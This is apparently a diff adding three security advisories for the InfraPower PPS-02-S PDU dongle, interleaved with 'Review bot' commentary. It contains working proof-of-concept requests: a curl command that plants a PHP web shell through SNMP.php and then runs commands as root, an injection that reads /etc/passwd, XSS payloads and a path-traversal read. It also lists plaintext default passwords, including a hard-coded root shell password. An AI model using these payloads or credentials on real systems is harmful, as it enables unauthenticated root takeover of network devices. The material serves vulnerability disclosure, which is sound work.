sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script
user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script
service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh
www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh
www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh

# showing accounts in root group:

Username: root
Password: 8475
--
Username: service
Password: ipdongle
--
Username: www
Password: 9311
--
Username: www2
Password: 9311

# showing other less-privileged accounts:

Username: user
Password: 8475
--
Username: admin
Password: 8475

--------

/mnt/mtd # echo $SHELL
/sbin/root_shell.sh
/mnt/mtd # cat /sbin/root_shell.sh
#!/bin/sh
trap "" 2 3 9 24

# check login
passWork=`cat /mnt/mtd/main_conf | grep RootPassEnable | cut -d " " -f 2`

if [ "$passWork" = "1" ]; then
login_file=/mnt/mtd/root_login
now_timestamp=`date +%s`

if [ -f $login_file ]; then
line=`wc -l $login_file | cut -c 1-9`
if [ "$line" != " 0" ] && [ "$line" != " 1" ] && [ "$line" != " 2" ]; then
pre_login=`tail -n 3 $login_file | cut -d " " -f 1`
pre_result1=`echo $pre_login | cut -d " " -f 1`
pre_result2=`echo $pre_login | cut -d " " -f 2`
pre_result3=`echo $pre_login | cut -d " " -f 3`
if [ "$pre_result1" = "fail" ] && [ "$pre_result2" = "fail" ] && [ "$pre_result3" = "fail" ]; then
pre_timestamp=`tail -n 1 $login_file | cut -d " " -f 2`
result=`/sbin/checkLoginTime $pre_timestamp $now_timestamp`
|
||||||
|
if [ "$result" != "success" ]; then
|
||||||
|
echo $result
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo -n "password:"
|
||||||
|
read pass
|
||||||
|
if [ "$pass" != "999" ]; then
|
||||||
|
echo "wrong password"
|
||||||
|
echo fail $now_timestamp >> $login_file
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
echo success $now_timestamp >> $login_file
|
||||||
|
fi
|
||||||
|
|
||||||
|
/bin/sh
|
||||||
|
/mnt/mtd #
|
||||||
|
|
||||||
|
--------
|
||||||
|
|
||||||
|
/mnt/mtd # ls
|
||||||
|
IMG001.exe boot.old.sh load_config.log main_conf net_conf passwd_conf snmp_conf web_conf
|
||||||
|
PDU3_ini box_conf log_memCheck.txt main_conf.bak net_conf.old port_conf snmpd.conf
|
||||||
|
PDU3_pol info.zip mac_addr me_login ntp_conf private start_service.log
|
||||||
|
|
||||||
|
--------
|
||||||
|
|
||||||
|
/mnt/mtd # df -h
|
||||||
|
|
||||||
|
Filesystem Size Used Available Use% Mounted on
|
||||||
|
tmpfs 256.0M 4.0K 256.0M 0% /tmp
|
||||||
|
/dev/mtdblock1 1.4M 96.0K 1.3M 7% /mnt/mtd
|
||||||
|
/dev/mtdblock5 1.0M 60.0K 964.0K 6% /mnt/mtd1
|
||||||
|
/dev/mtdblock6 1.0M 60.0K 964.0K 6% /mnt/mtd2
|
||||||
|
/dev/mtdblock7 1.0M 60.0K 964.0K 6% /mnt/mtd3
|
||||||
|
|
||||||
|
--------
|
||||||
|
|
||||||
|
/www # ls -al
|
||||||
|
|
||||||
|
drwxr-xr-x 5 1013 1014 0 Jan 13 08:41 .
|
||||||
|
drwxr-xr-x 16 root root 0 Nov 28 11:17 ..
|
||||||
|
-rwxr--r-- 1 1013 1014 6875 Apr 22 2014 CSSSource.php
|
||||||
|
-rwxr--r-- 1 1013 1014 291 Apr 22 2014 Config.php
|
||||||
|
-rwxr--r-- 1 1013 1014 1685 Apr 22 2014 ConnPort.php
|
||||||
|
-rwxr--r-- 1 1013 1014 5787 Apr 22 2014 FWUpgrade.php
|
||||||
|
-rwxr--r-- 1 1013 1014 7105 Apr 22 2014 Firmware.php
|
||||||
|
-rwxr--r-- 1 1013 1014 10429 Apr 22 2014 Function.php
|
||||||
|
drwxr-xr-x 2 1013 1014 0 Apr 22 2014 General
|
||||||
|
-rwxr--r-- 1 1013 1014 1407 Apr 22 2014 Header.php
|
||||||
|
-rwxr--r-- 1 1013 1014 6775 Apr 22 2014 IPSettings.php
|
||||||
|
drwxr-xr-x 2 1013 1014 0 Apr 22 2014 Images
|
||||||
|
drwxr-xr-x 2 1013 1014 0 Apr 22 2014 JavaScript
|
||||||
|
-rwxr--r-- 1 1013 1014 408 Apr 22 2014 JavaSource.php
|
||||||
|
-rwxr--r-- 1 1013 1014 849 Apr 22 2014 ListFile.php
|
||||||
|
-rwxr--r-- 1 1013 1014 12900 Apr 22 2014 Login.php
|
||||||
|
-rwxr--r-- 1 1013 1014 355 Apr 22 2014 Logout.php
|
||||||
|
-rwxr--r-- 1 1013 1014 352 Apr 22 2014 Main_Config.php
|
||||||
|
-rwxr--r-- 1 1013 1014 5419 Apr 22 2014 Menu.php
|
||||||
|
-rwxr--r-- 1 1013 1014 942 Apr 22 2014 Menu_3.php
|
||||||
|
-rwxr--r-- 1 1013 1014 4491 Apr 22 2014 Ntp.php
|
||||||
|
-rwxr--r-- 1 1013 1014 23853 Apr 22 2014 OutletDetails.php
|
||||||
|
-rwxr--r-- 1 1013 1014 1905 Apr 22 2014 OutletDetails_Ajax.php
|
||||||
|
-rwxr--r-- 1 1013 1014 48411 Apr 22 2014 PDUDetails.php
|
||||||
|
-rwxr--r-- 1 1013 1014 4081 Apr 22 2014 PDUDetails_Ajax_Details.php
|
||||||
|
-rwxr--r-- 1 1013 1014 1397 Apr 22 2014 PDUDetails_Ajax_Outlet.php
|
||||||
|
-rwxr--r-- 1 1013 1014 19165 Apr 22 2014 PDULog.php
|
||||||
|
-rwxr--r-- 1 1013 1014 29883 Apr 22 2014 PDUStatus.php
|
||||||
|
-rwxr--r-- 1 1013 1014 4418 Apr 22 2014 PDUStatus_Ajax.php
|
||||||
|
-rwxr--r-- 1 1013 1014 7791 Apr 22 2014 PortSettings.php
|
||||||
|
-rwxr--r-- 1 1013 1014 24696 Apr 22 2014 SNMP.php
|
||||||
|
-rwxr--r-- 1 1013 1014 38253 Apr 22 2014 SensorDetails.php
|
||||||
|
-rwxr--r-- 1 1013 1014 27210 Apr 22 2014 SensorStatus.php
|
||||||
|
-rwxr--r-- 1 1013 1014 5984 Apr 22 2014 SensorStatus_Ajax.php
|
||||||
|
-rwxr--r-- 1 1013 1014 40944 Apr 22 2014 System.php
|
||||||
|
-rwxr--r-- 1 1013 1014 4373 Apr 22 2014 UploadEXE.php
|
||||||
|
-rwxr--r-- 1 1013 1014 9460 Apr 22 2014 User.php
|
||||||
|
-rwxr--r-- 1 1013 1014 23170 Apr 22 2014 WriteRequest.php
|
||||||
|
-rwxr--r-- 1 1013 1014 8850 Apr 22 2014 WriteRequest_Ajax.php
|
||||||
|
-rwxr--r-- 1 1013 1014 10811 Apr 22 2014 dball.php
|
||||||
|
-rwxr--r-- 1 1013 1014 771 Apr 22 2014 doupgrate.php
|
||||||
|
-rwxr--r-- 1 1013 1014 76 Apr 22 2014 index.php
|
||||||
|
-rwxr--r-- 1 1013 1014 49 Apr 22 2014 nfs.sh
|
||||||
|
-rwxr--r-- 1 1013 1014 5410 Apr 22 2014 production_test1.php
|
||||||
|
-rwxr--r-- 1 1013 1014 723 Apr 22 2014 vaildate.php
|
||||||
|
-rwxr--r-- 1 1013 1014 611 Apr 22 2014 wiseup.php
|
||||||
|
|
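Review bot: the Desc paragraph only accounts for the telnet accounts, but the /sbin/root_shell.sh listing in this hunk shows a second fixed secret that Desc should name: when RootPassEnable is 1 the login shell prompts for a password and compares it against the literal string in `if [ "$pass" != "999" ]; then`, and the lockout only consults the last three entries of /mnt/mtd/root_login before calling /sbin/checkLoginTime. Since the root shell is itself gated by a hard-coded constant, state that alongside the passwd hashes so the fix scope (re-keyable credentials at both layers, not only the passwd entries) is clear. Minor: `trap "" 2 3 9 24` cannot catch signal 9, so the line does not give the shell the protection it appears to.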
348
platforms/hardware/webapps/40640.txt
Executable file
@ -0,0 +1,348 @@
InfraPower PPS-02-S Q213V1 Unauthenticated Remote Root Command Execution


Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)

Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient cient application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.

Desc: InfraPower suffers from multiple unauthenticated remote command
injection vulnerabilities. The vulnerability exist due to several POST
parameters in several scripts not being sanitized when using the exec(),
proc_open(), popen() and shell_exec() PHP function while updating the
settings on the affected device. This allows the attacker to execute
arbitrary system commands as the root user and bypass access controls in
place.

Tested on: Linux 2.6.28 (armv5tel)
lighttpd/1.4.30-devel-1321
PHP/5.3.9
SQLite/3.7.10


Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2016-5372
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5372.php


27.09.2016

--


doupgrate.php:
--------------


09: <?
10: echo "Firmware Upgrate Using NFS:<BR>";
11: echo "IP=".$_POST["ipaddr"]."<BR>";
12: echo "Firmware Name=".$_POST["fwname"]."<BR>";
13: system("sh nfs.sh");
14: echo "Mounting NFS<BR>";
15: system("mount -t nfs -o nolock ".$_POST["ipaddr"].":".$_POST["nfsdir"]." /nfs");
16: system("cp /nfs/".$_POST["fwname"]." /");
17: echo "Flash erasing<BR>";
18: system("@flash_eraseall /dev/mtd0");
19: system("cp /".$_POST["fwname"]." /dev/mtd0");
20: echo "Upgrate done<BR>";
21: system("umount /nfs");
22: echo "Reboot system<BR>";
23: system("reboot");
24: ?>

---------------------------------------------------------------------


IPSettings.php:
---------------


83: $IP_setting = ereg_ip($_POST['IP']);
84: $Netmask_setting = ereg_ip($_POST['Netmask']);
85: $Gateway_setting = ereg_ip($_POST['Gateway']);
...
...
110: $fout = fopen("/mnt/mtd/net_conf", "w");
111: if($fout){
112: $output = substr($output, 0, -1);
113: fprintf($fout, "%s", $output);
114: //echo $change_ip.'b';
115: if($change_ip === '1'){
116: $str = '';
117: exec('ifconfig eth0 '.$IP_setting.' netmask '.$Netmask_setting, $str);
118: // echo $str."\n";
119: }
120: if($change_gw === '1'){
121: $str = '';
122: exec('ip route del default', $str);
123: exec('route add default gw '.$Gateway_setting, $str);
124: // echo $str[0]."a\n";
125: }
126: }
127: fclose($fout);
...
...
164: function ereg_ip($ipstring){
165: $ipstring=trim($ipstring); //移除前後空白
166: //格式錯誤
167: if(!ereg("^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$",$ipstring))return 0;
168: //內容檢查
169: $ip_segment =split("\.",$ipstring); //注意一定要加 "\",否則會分不開。
170: foreach($ip_segment as $k =>$v){
171: if($v >255){
171: return 0;
172: }
173: $ip_segment[$k]=(int)$ip_segment[$k]; //消除ip中的0,ex:1.020.003.004 =>1.20.3.4
174: } //end foreach
175: $ipstring ="$ip_segment[0].$ip_segment[1].$ip_segment[2].$ip_segment[3]"; //將字串$ip處理
176: return $ipstring;
177: }

---------------------------------------------------------------------


Login.php:
----------


126: $UserName = getConf("/mnt/mtd/web_conf", "UserName");
127: $Password = getConf("/mnt/mtd/web_conf", "Password");
128:
129: //echo 'z'.$_POST['ID_User'].';'.$UserName.' Pwd:'.$_POST['ID_Password'].';'.$Password;
130: if($_POST['ID_User'] === $UserName && $_POST['ID_Password'] === $Password){
...
...
140: $_SESSION['Login'] = $_POST['ID_User'];
141:
142: //Login
143: $loginTime = date("Y-m-d,H:i:s.0,P");
144: $remoteIP = $_SERVER['REMOTE_ADDR'];
145: //----------SNMP checking ---Ed 20130307------------------------<
146: $SNMPEnable = getConf("/mnt/mtd/snmp_conf", "enable");
147: if ($SNMPEnable == "1") {
148: $TrapEnable = getConf("/mnt/mtd/snmp_conf", "trap");
149: if ($TrapEnable == "v2Trap") {
150: $trapTo = getConf("/mnt/mtd/snmp_conf", "IP");
151: shell_exec('/usr/bin/snmptrap -M /usr/share/snmp/mibs/ -c public -v 2c ' . $trapTo . ' \'\' InfraPower-MIB::webLogin InfraPower-MIB::objectDateTime s "' . $loginTime . '" InfraPower-MIB::userName s "' . $_POST['ID_User'] . '" InfraPower-MIB::webAccessIpAddress s "' . $remoteIP . '"');
152: //echo "alert($res);";
153: }
154: }

---------------------------------------------------------------------


Ntp.php:
--------


36: <?php
37: if(empty($_POST['Change']))
38: $tzone='8';
39: else
40: {
41:
42: $tzone=$_POST['ID_timezone'];
43: $idx=$tzone+12;
44: echo "update status...";
45: exec("/usr/bin/ntpclient -s -h 220.130.158.71");
46: exec("/usr/bin/zonegen ".$idx);
47: exec("/usr/bin/zic -d /usr/bin/ zonetime");
48: exec("mv /usr/bin/localtime /etc/localtime");
49: echo "OK";
50: }
51: ?>

---------------------------------------------------------------------


production_test1.php:
---------------------


4: if( isset($_POST['macAddress']) )
5: {
6: shell_exec("echo ". $_POST['macAddress'] . " > /mnt/mtd/mac_addr");
7: $mac = shell_exec("cat /mnt/mtd/mac_addr");
8: /*$result = $fail;
9: echo $mac . ",";
10: echo $_POST['macAddress'];
11: if( !strcmp($mac,$_POST['macAddress']) )
12: $result = $success;
13: echo "verify - " . $mac . " - " . $result;*/
14: echo "verify - " . $mac;
15:
16: exit();
17: }

---------------------------------------------------------------------


SNMP.php:
---------


34: if($_POST["SNMPAgent"] === "Enable"){
35: exec('kill -9 `ps | grep "snmpd -c /mnt/mtd/snmpd.conf" | cut -c 1-5`');
36: setConf("/mnt/mtd/snmp_conf", "enable", "1");
37:
38: if(!empty($_POST["CommuintyString"]) && !empty($_POST["CommuintyWrite"]))
39: {
40: exec("cp /etc/snmpd.conf /mnt/mtd/snmpd.conf");
41: exec("sed -i s/public/".$_POST["CommuintyString"]."/g /mnt/mtd/snmpd.conf");
42: setConf("/mnt/mtd/snmp_conf", "pCommunity", $_POST["CommuintyString"]);
43: setSnmpConf(1,$_POST["CommuintyString"]);
44: setSnmpConf(2,$_POST["CommuintyWrite"]);
45: $pCommunity = $_POST["CommuintyString"];
46: }

---------------------------------------------------------------------


System.php:
-----------


86: if(!empty($_POST['ChangeTime']) == "1"){
87: if(checkdate($_POST['month'], $_POST['day'], $_POST['year']) == 1){
88:
89: //Ray modify
90: $datetime = date("mdHiY.s", mktime($_POST['hour']-1,$_POST['minute']-1,$_POST['second']-1,$_POST['month'],$_POST['day'],$_POST['year']));
91: //$datetime = $_POST['month'].$_POST['day'].$_POST['hour'].$_POST['minute'].$_POST['year'].'.'.$_POST['second'];
92:
93:
94: if(isset($_POST['TimeZone'])){
95: setTimeZone($_POST['TimeZone']);
96: $orgZone = $_POST['TimeZone'];
97: }
98:
99: exec('date '.$datetime);
100: exec('hwclock -w');
101: exec('hwclock -w -f /dev/rtc1');
...
...
180: if(isset($_POST['TimeServer'])){
181: //$TimeServer = ereg_ip($_POST['TimeServer']);
182: if(!empty($_POST['TimeServer'])){
183: $TimeServer = $_POST['TimeServer'];
184:
185: $returnStr = exec("/usr/bin/ntpclient -s -h ".$TimeServer . " -i 1");
...
...
286: exec('ifconfig eth0 '.$IP_setting.' netmask '.$Netmask_setting, $str);
...
...
292: exec('route add default gw '.$Gateway_setting, $str);
...
...
336: function ereg_ip($ipstring){
337: $ipstring=trim($ipstring); //移除前後空白
338: //格式錯誤
339: if(!ereg("^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$",$ipstring))return 0;
340: //內容檢查
341: $ip_segment =split("\.",$ipstring); //注意一定要加 "\",否則會分不開。
342: foreach($ip_segment as $k =>$v){
343: if($v >255){
344: return 0;
345: }
346: $ip_segment[$k]=(int)$ip_segment[$k]; //消除ip中的0,ex:1.020.003.004 =>1.20.3.4
347: } //end foreach
348: $ipstring ="$ip_segment[0].$ip_segment[1].$ip_segment[2].$ip_segment[3]"; //將字串$ip處理
349: return $ipstring;
350: }

---------------------------------------------------------------------


UploadEXE.php:
--------------


72: if(isset($_POST['hasFile'])){
73: if ($_FILES['ExeFile']['error'] > 0){
74: echo 'Error: ' . $_FILES['FW']['error'];
75: }else{
76: echo 'File Name: ' . $_FILES['ExeFile']['name'].'<br/>';
...
...
80: move_uploaded_file($_FILES['ExeFile']['tmp_name'], '/ramdisk/'.$_FILES['ExeFile']['name']);
81: chmod("/ramdisk/".$_FILES['ExeFile']['name'], "0777");
82: $fp = popen("\"/ramdisk/".$_FILES['ExeFile']['name']."\"", "r");

---------------------------------------------------------------------
---------------------------------------------------------------------
---------------------------------------------------------------------


#1
--

PoC Request:

curl -i -s -k -X 'POST' \
-H 'User-Agent: ZSL-Injectinator/3.1 (Unix)' -H 'Content-Type: application/x-www-form-urlencoded' \
--data-binary $'SNMPAgent=Enable&CommuintyString=public|%65%63%68%6f%20%22%3c%3f%70%68%70%20%65%63%68%6f%20%73%79%73%74%65%6d%28%5c%24%5f%47%45%54%5b%27%63%27%5d%29%3b%20%3f%3e%22%20%3Etest251.php%26&CommuintyWrite=private&TrapsVersion=v2Trap&IP=192.168.0.254' \
'https://192.168.0.17/SNMP.php?Menu=SMP'

...

curl -k https://192.168.0.17/test251.php?c=whoami;echo " at ";uname -a

Response:

root
at
Linux A320D 2.6.28 #866 PREEMPT Tue Apr 22 16:07:03 HKT 2014 armv5tel unknown


#2
--

PoC Request:

POST /production_test1.php HTTP/1.1
Host: 192.168.0.17
User-Agent: ZSL-Injectinator/3.1 (Unix)
Content-Type: application/x-www-form-urlencoded
Connection: close

macAddress=ZE:RO:SC:IE:NC:E0;cat /etc/passwd


Response:

HTTP/1.1 200 OK
X-Powered-By: PHP/5.3.9
Content-type: text/html
Connection: close
Date: Fri, 17 Jan 2003 16:58:52 GMT
Server: lighttpd/1.4.30-devel-1321
Content-Length: 751

verify - root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script
user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script
service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh
www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh
www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh
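Review bot: the IPSettings.php and System.php excerpts do not support the injection claim for the lines the scanner flags (IPSettings.php 117/123, System.php 286/292): lines 83-85 route the POST values through ereg_ip(), and the function shown at lines 164-177 returns 0 for anything that fails the anchored dotted-quad regex, returns 0 for any octet above 255, and rebuilds the string from (int)-cast segments, so only a canonical address or a literal 0 ever reaches exec(). The same holds for Ntp.php line 46 (`$idx=$tzone+12;` is arithmetic, so $idx is a number) and System.php line 99 (`$datetime` is the output of date("mdHiY.s", ...)). The sinks this hunk actually demonstrates are SNMP.php line 41 (PoC #1) and production_test1.php line 6 (PoC #2), plus the unfiltered $_POST/$_FILES uses in doupgrate.php 15/16/19, Login.php 151, System.php 185 and UploadEXE.php 82; suggest restricting Desc and the listings to those, and stating the fix as escapeshellarg() on every interpolated argument (or, for IP-typed inputs, the ereg_ip()-style whitelist the code already has) rather than the unspecific "several scripts".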
235
platforms/php/webapps/40641.txt
Executable file
@ -0,0 +1,235 @@
InfraPower PPS-02-S Q213V1 Multiple XSS Vulnerabilities


Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)

Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient cient application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.

Desc: InfraPower suffers from multiple stored and reflected XSS vulnerabilities
when input passed via several parameters to several scripts is not properly
sanitized before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in context of an affected
site.

Tested on: Linux 2.6.28 (armv5tel)
lighttpd/1.4.30-devel-1321
PHP/5.3.9
SQLite/3.7.10


Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2016-5369
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5369.php


27.09.2016

--


#################################################################################

GET /SensorDetails.php?Menu=SST&DeviceID=C100"><script>alert(1)</script> HTTP/1.1

#################################################################################

POST /FWUpgrade.php HTTP/1.1
Host: 192.168.0.17
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary207OhXVwesC60pdh
Connection: close

------WebKitFormBoundary207OhXVwesC60pdh
Content-Disposition: form-data; name="FW"; filename="somefile.php<img src=x onerror=confirm(2)>"
Content-Type: text/php

t00t
------WebKitFormBoundary207OhXVwesC60pdh
Content-Disposition: form-data; name="upfile"

somefile.php
------WebKitFormBoundary207OhXVwesC60pdh
Content-Disposition: form-data; name="ID_Page"

Firmware.php?Menu=FRM
------WebKitFormBoundary207OhXVwesC60pdh--


#################################################################################

POST /SNMP.php?Menu=SMP HTTP/1.1
Host: 192.168.0.17

SNMPAgent=Enable&CommuintyString=public&CommuintyWrite=private&TrapsVersion=v2Trap&IP=192.168.0.254';alert(3)//

#################################################################################


lqwrm@zslab:~#
lqwrm@zslab:~# ./scanmyphp -v -r -d infrapower -o scan_output.txt
-------------------------------------------------
PHP Source Code Security Scanner v0.2
(c) Zero Science Lab - http://www.zeroscience.mk
Tue Sep 27 10:35:52 CEST 2016
-------------------------------------------------

Scanning recursively...Done.

dball.php:

Line 45: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
Line 45: Cross-Site Scripting (XSS) in 'echo' via '$Table'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'


doupgrate.php:

Line 11: Cross-Site Scripting (XSS) in 'echo' via '$_POST'
Line 12: Cross-Site Scripting (XSS) in 'echo' via '$_POST'
Line 15: Command Injection in 'system' via '$_POST'
Line 16: Command Injection in 'system' via '$_POST'
Line 19: Command Injection in 'system' via '$_POST'


Firmware.php:

Line 166: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER'


Function.php:

Line 257: Header Injection in 'header' via '$_SERVER'
Line 267: Header Injection in 'header' via '$_SERVER'


FWUpgrade.php:

Line 39: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
Line 43: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
Line 44: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
Line 45: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'


index.php:

Line 2: Header Injection in 'header' via '$_SERVER'


IPSettings.php:

Warning: ereg() function deprecated in PHP => 5.3.0. Relying on this feature is highly discouraged.
Warning: split() function deprecated in PHP => 5.3.0. Relying on this feature is highly discouraged.
Line 117: Command Injection in 'exec' via '$IP_setting'
Line 117: Command Injection in 'exec' via '$Netmask_setting'
Line 123: Command Injection in 'exec' via '$Gateway_setting'


ListFile.php:

Line 12: PHP File Inclusion in 'fgets' via '$fp'


Login.php:

Line 151: Command Injection in 'shell_exec' via '$_POST'


Ntp.php:

Line 46: Command Injection in 'exec' via '$idx'


OutletDetails.php:

Line 78: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
Line 241: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
Line 623: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
Line 674: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
Line 730: Cross-Site Scripting (XSS) in 'echo' via '$row'
Line 732: Cross-Site Scripting (XSS) in 'echo' via '$row'
Line 914: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'


PDUStatus.php:

Line 625: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER'


production_test1.php:

Line 6: Command Injection in 'shell_exec' via '$_POST'
Line 45: Command Injection in 'proc_open' via '$_ENV'


SensorDetails.php:

Line 844: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
Line 896: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
Line 1233: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'


SensorStatus.php:

Line 695: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER'


SNMP.php:

Line 41: Command Injection in 'exec' via '$_POST'


System.php:

Line 54: Header Injection in 'header' via '$_SERVER'
Line 64: Header Injection in 'header' via '$_SERVER'
Line 99: Command Injection in 'exec' via '$datetime'
Line 99: Command Injection in 'exec' via '$datetime'
Line 99: Command Injection in 'exec' via '$datetime'
Line 99: Command Injection in 'exec' via '$datetime'
Line 99: Command Injection in 'exec' via '$datetime'
Line 99: Command Injection in 'exec' via '$datetime'
Line 185: Command Injection in 'exec' via '$TimeServer'
Line 286: Command Injection in 'exec' via '$IP_setting'
Line 286: Command Injection in 'exec' via '$Netmask_setting'
Line 292: Command Injection in 'exec' via '$Gateway_setting'


UploadEXE.php:

Line 74: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
Line 76: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
Line 82: Command Injection in 'popen' via '$_FILES'
Line 96: PHP File Inclusion in 'fgets' via '$fp'
Line 96: PHP File Inclusion in 'fgets' via '$buffer'


WriteRequest.php:

Line 96: Cross-Site Scripting (XSS) in 'echo' via '$_POST'
Line 96: Cross-Site Scripting (XSS) in 'echo' via '$Page'
Line 96: Cross-Site Scripting (XSS) in 'echo' via '$Page'


-----------------------------------------------------
Scan finished. Check results in scan_output.txt file.

lqwrm@zslab:~#
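Review bot: the three PoC requests are not mapped to sinks, and the scanner appendix never lists the one the third PoC hits: the `';alert(3)//` value in the SNMP.php IP parameter targets a JavaScript string context, which the 'echo'-based findings do not report for SNMP.php at all, so the stored/reflected split asserted in Desc is unsubstantiated per vector. Suggest annotating each PoC with file and line (SensorDetails.php DeviceID to the '$DeviceID' hits at 844/896/1233; the FWUpgrade.php filename to the '$_FILES' hits at 39-46; the SNMP.php IP sink to the line that writes it into script, with json_encode() or ENT_QUOTES escaping named as the fix for that context rather than htmlspecialchars() alone), and trimming the appendix to XSS findings, since the command-injection and header-injection entries belong to the companion ZSL-2016-5372 advisory and the five identical dball.php line 46 pairs are duplicates.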
389
platforms/php/webapps/40642.txt
Executable file
@ -0,0 +1,389 @@
InfraPower PPS-02-S Q213V1 Local File Disclosure Vulnerability


Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)

Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient cient application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.

Desc: InfraPower suffers from a file disclosure vulnerability when
input passed thru the 'file' parameter to 'ListFile.php' script is
not properly verified before being used to read files. This can
be exploited to disclose contents of files from local resources.

-------------------------------------------------------------------
ListFile.php:
-------------

8: if(isset($_GET['file'])){
9: $handle = $_GET['file'];
10: $fp = fopen('/ramdisk/'.$handle, 'r');
11: while(!feof($fp)){
12: $tmp=fgets($fp,2000);
13: $tmp = str_replace("\n","<br />",$tmp);
14: echo $tmp;
15: }
16: fclose($fp);
17: }

-------------------------------------------------------------------


Tested on: Linux 2.6.28 (armv5tel)
lighttpd/1.4.30-devel-1321
PHP/5.3.9
SQLite/3.7.10


Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2016-5370
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5370.php


27.09.2016

--


http://192.168.0.17/ListFile.php?file=../../../../../../../etc/passwd

root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh
